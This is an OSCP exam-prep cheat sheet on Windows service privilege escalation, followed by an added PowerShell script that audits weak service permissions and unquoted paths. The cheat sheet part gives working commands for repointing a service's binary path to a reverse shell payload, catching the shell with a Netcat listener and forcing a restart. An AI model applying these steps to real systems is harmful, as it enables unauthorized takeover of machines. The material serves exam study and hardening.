Windows Privilege Escalation Cheat Sheet – Service Exploits
Service exploits are very likely to come up in your OSCP exam.
This can include things like insecure file permissions and unquoted service paths, amongst others.
This should probably be your biggest area of focus for Windows priv esc before your exam.
Insecure service permissions
Run winPEAS to check whether you can change the configuration of a service or not:
Download winPEAS to your Windows target
Execute the binary:
winpeas.exe
Can you modify the service?
Download accesschk.exe to your Windows target
accesschk.exe /accepteula -uwcqv <USER> <SERVICE>
What does the service do? Can your user restart it?
sc qc <SERVICE>
'DEMAND_START' means the service has a manual start type, so it has to be started (or restarted) by hand
'BINARY_PATH_NAME' points to the service executable
What is the current state of the service?
sc query <SERVICE>
Can you set a new binary path for the service?
If so, download a reverse shell payload to your target and set a new path:
sc config <SERVICE> binpath= "C:\NEW\PATH\TO\BINARY"
Note that the space after binpath= is required by sc.
Set up a Netcat listener:
nc -lnvp <PORT>
Start or restart the service:
net start <SERVICE>
or, since net has no restart command, stop it and start it again:
net stop <SERVICE> && net start <SERVICE>
or, if the service's start type is disabled, set it to manual and then start it:
sc config <SERVICE> start= demand
sc start <SERVICE>
You might need to stop the service first:
net stop <SERVICE>
Offensive Security might try to be sneaky and disable your ability to start or restart a service.
You can, however, get around this by restarting the machine (if the service autoruns on startup):
shutdown /r
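From the defender's side, the PowerShell audit below is an added example (not part of this cheat sheet) that reports the conditions the steps above rely on: services whose DACL grants change-config or write rights to low-privilege groups, plus unquoted binary paths containing spaces. It assumes an elevated PowerShell 5.1+ session and parses the SDDL that sc sdshow prints; trustees given as full SIDs (domain groups) are not classified.

```powershell
# Added audit example, not part of the cheat sheet: list services that a
# non-admin could reconfigure, and services with an unquoted binary path.
# Reads the descriptors that `sc sdshow` prints; run from an elevated prompt.

# SDDL right tokens that allow altering the service or its ACL, with their bit
# values for descriptors that encode rights as a hex mask instead of letters.
$RightBits = @{ DC = 0x2; GW = 0x40000000; GA = 0x10000000; WD = 0x40000; WO = 0x80000 }
# Well-known SID aliases that every non-admin account is a member of.
$LowPrivTrustees = @('WD', 'AU', 'BU', 'IU', 'AN')  # Everyone, Authenticated Users, Users, Interactive, Anonymous

function Get-DangerousRights([string]$rights) {
    if ($rights -like '0x*') {
        $mask = [Convert]::ToInt64($rights.Substring(2), 16)
        return @($RightBits.Keys | Where-Object { ($mask -band $RightBits[$_]) -ne 0 })
    }
    # Letter form: two-character tokens run together, e.g. CCDCLCSWRPWPDTLOCRRC
    $tokens = [regex]::Matches($rights, '..') | ForEach-Object { $_.Value }
    return @($tokens | Where-Object { $RightBits.ContainsKey($_) })
}

function Test-UnquotedPath([string]$path) {
    # Flag a path that is not quoted and has a space before the executable name ends
    return ($path -notmatch '^\s*"') -and (($path -split '\.exe', 2)[0] -match '\s')
}

function Get-WeakServiceConfig {
    $binPaths = @{}
    Get-CimInstance Win32_Service | ForEach-Object { $binPaths[$_.Name] = $_.PathName }
    foreach ($name in $binPaths.Keys) {
        # `sc` alone is the Set-Content alias in PowerShell, so call sc.exe explicitly
        $sddl = (sc.exe sdshow $name 2>$null | ForEach-Object { $_.Trim() } | Where-Object { $_ -like 'D:*' }) -join ''
        $dacl = ($sddl -split 'S:')[0]   # keep only the DACL, drop any SACL part
        # ACE format: (type;flags;rights;object_guid;inherit_guid;trustee); only allow ACEs matter here
        foreach ($m in [regex]::Matches($dacl, '\(A;[^;]*;([^;]*);[^;]*;[^;]*;([^)]*)\)')) {
            $trustee = $m.Groups[2].Value
            if ($LowPrivTrustees -notcontains $trustee) { continue }
            $hits = @(Get-DangerousRights $m.Groups[1].Value)
            if ($hits.Count -gt 0) {
                [pscustomobject]@{ Service = $name; Trustee = $trustee; Rights = ($hits -join ','); BinPath = $binPaths[$name] }
            }
        }
        if (Test-UnquotedPath $binPaths[$name]) {
            [pscustomobject]@{ Service = $name; Trustee = '-'; Rights = 'UNQUOTED_PATH'; BinPath = $binPaths[$name] }
        }
    }
}

Get-WeakServiceConfig | Format-Table -AutoSize
```

Any row with DC, WD, WO, GA or GW for Everyone, Authenticated Users or Users should have its ACL tightened with sc sdset or via Group Policy, and unquoted paths should be fixed by quoting the binary path in the service configuration.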